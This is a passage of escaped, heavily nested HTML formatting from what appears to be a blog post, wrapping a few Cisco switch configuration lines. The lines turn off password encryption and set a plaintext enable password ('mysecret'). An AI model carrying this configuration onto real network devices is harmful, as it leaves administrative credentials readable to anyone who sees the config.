class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;no service password-encryption&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;!&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;hostname 3512xl&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;!&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;no logging console&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;enable password mysecret&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;!&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;!&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;!&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;!&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;!&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;ip subnet-zero&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/pre&gt;&lt;pre style="font-size: 13px; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 255); font-style: italic; "&gt;&lt;span class="Apple-style-span" style="color: rgb(0, 0, 0); font-style: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; "&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-weight: normal; color: 